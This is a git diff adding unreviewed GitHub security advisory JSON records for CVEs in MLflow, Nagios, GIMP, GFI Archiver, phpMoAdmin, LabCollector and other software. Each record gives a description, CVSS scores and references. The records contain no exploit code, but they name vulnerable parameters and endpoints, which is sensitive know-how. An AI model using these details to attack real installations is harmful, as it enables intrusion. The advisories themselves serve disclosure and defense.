b/advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json new file mode 100644 index 0000000000000..098a8df9b049e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq3w-7jj3-x7gr", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2635" + ], + "details": "MLflow Use of Default Password Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of MLflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the basic_auth.ini file. The file contains hard-coded default credentials. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of the administrator. Was ZDI-CAN-28256.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2635" + }, + { + "type": "WEB", + "url": "https://github.com/mlflow/mlflow/pull/19260" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-111" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1393" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json b/advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json new file mode 100644 index 0000000000000..458ae6f3a31ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc96-x3gj-mp7g", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25453" + ], + "details": "phpMoAdmin 1.1.5 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the newdb parameter. Attackers can craft URLs with JavaScript payloads in the newdb parameter of moadmin.php to execute arbitrary code in users' browsers when they visit the malicious link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25453" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46082" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/phpmoadmin-reflected-cross-site-scripting-via-moadminphp" + }, + { + "type": "WEB", + "url": "http://www.phpmoadmin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json b/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json new file mode 100644 index 0000000000000..1c909829d0a77 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2r8-vmq7-fpx2", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2033" + ], + "details": "MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of artifact file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26649.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2033" + }, + { + "type": "WEB", + "url": "https://github.com/mlflow/mlflow/pull/19260" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-105" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json b/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json new file mode 100644 index 0000000000000..8f640c2bf8511 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2wq-f7jq-885v", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25436" + ], + "details": "Sricam DeviceViewer 3.12.0.1 contains a password change security bypass vulnerability that allows authenticated users to change passwords without proper validation of the old password field. Attackers can inject a large payload into the old password parameter during the change password process to bypass validation and set an arbitrary new password.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25436" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47476" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/sricam-deviceviewer-password-change-security-bypass" + }, + { + "type": "WEB", + "url": "http://www.sricam.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json b/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json new file mode 100644 index 0000000000000..524af1475ea00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q77w-wghg-55fv", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2043" + ], + "details": "Nagios Host esensors_websensor_configwizard_func Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the esensors_websensor_configwizard_func method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28249.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2043" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-072" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json b/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json new file mode 100644 index 0000000000000..fb41a34cbaba9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8fp-vccx-9w2h", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2039" + ], + "details": "GFI Archiver MArc.Store Missing Authorization Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the MArc.Store.Remoting.exe process, which listens on port 8018. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM. Was ZDI-CAN-28597.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2039" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-077" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json b/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json new file mode 100644 index 0000000000000..45941c2bed175 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qp8f-9474-hr27", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2041" + ], + "details": "Nagios Host zabbixagent_configwizard_func Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the zabbixagent_configwizard_func method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28250.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2041" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-073" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json b/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json new file mode 100644 index 0000000000000..dd93f8cee5a75 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqfx-94p8-6p39", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25438" + ], + "details": "LabCollector 5.423 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL commands by injecting malicious code through POST parameters. Attackers can submit crafted SQL payloads in the login parameter of login.php or the user_name parameter of retrieve_password.php to extract sensitive database information without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25438" + }, + { + "type": "WEB", + "url": "https://labcollector.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47460" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/labcollector-sql-injection-via-loginphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json b/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json new file mode 100644 index 0000000000000..72fb404453dbc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r872-6r9v-fwgg", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25441" + ], + "details": "thesystem 1.0 contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary system commands by submitting malicious input to the run_command endpoint. Attackers can send POST requests with shell commands in the command parameter to execute arbitrary code on the server without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25441" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47441" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-command-injection-via-runcommand-endpoint" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json b/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json new file mode 100644 index 0000000000000..d27a55f54169b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rc45-jprg-5pmq", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2038" + ], + "details": "GFI Archiver MArc.Core Missing Authorization Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the MArc.Core.Remoting.exe process, which listens on port 8017. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM. Was ZDI-CAN-27934.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2038" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json b/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json new file mode 100644 index 0000000000000..2160c1b380f06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwr9-9r33-h7x4", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2042" + ], + "details": "Nagios Host monitoringwizard Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the monitoringwizard module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28245.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2042" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-071" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json b/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json new file mode 100644 index 0000000000000..da10ca32f5bb8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm4c-6g35-79xf", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2026-2858" + ], + "details": "A vulnerability was identified in wren-lang wren up to 0.4.0. This affects the function peekChar of the file src/vm/wren_compiler.c of the component Source File Parser. Such manipulation leads to out-of-bounds read. The attack needs to be performed locally. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2858" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren/issues/1217" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i1217/repro" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347097" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347097" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754489" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T22:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json b/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json new file mode 100644 index 0000000000000..bcebc42dd1ebc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fh-vjwm-p6c4", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25431" + ], + "details": "delpino73 Blue-Smiley-Organizer 1.32 contains an SQL injection vulnerability in the datetime parameter that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL code through POST requests to extract sensitive data using boolean-based blind and time-based blind techniques, or write files to the server using INTO OUTFILE statements.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25431" + }, + { + "type": "WEB", + "url": "https://github.com/delpino73/Blue-Smiley-Organizer" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47550" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/delpino-blue-smiley-organizer-sql-injection-via-datetime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json b/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json new file mode 100644 index 0000000000000..5c7e3f33253fb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx92-h8q5-hfm6", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2045" + ], + "details": "GIMP XWD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XWD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28265.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2045" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/68b27dfb1cbd9b3f22d7fa624dbab8647ee5f275" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json b/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json new file mode 100644 index 0000000000000..58c39b42e59a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhcq-9mcp-rrvr", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2047" + ], + "details": "GIMP ICNS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28530.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2047" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2600/diffs?commit_id=dd2faac351f1ff2588529fedc606e6a5f815577c" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-120" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json b/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json new file mode 100644 index 0000000000000..0fcb203fa5f4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwhr-hxqf-pv44", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2026-0777" + ], + "details": "Xmind Attachment Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xmind. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of attachments. When opening an attachment, the user interface fails to warn the user of unsafe actions. An attacker can leverage this vulnerability to execute code in the context of current user. Was ZDI-CAN-26034.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0777" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-069" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-356" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T22:16:19Z" + } +} \ No newline at end of file From 4a25af68e5b6006b29ed19b7cd19109647ff538f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 03:32:59 +0000 Subject: [PATCH 33/77] Publish GHSA-gfw7-2v73-69wg --- .../GHSA-gfw7-2v73-69wg.json | 43 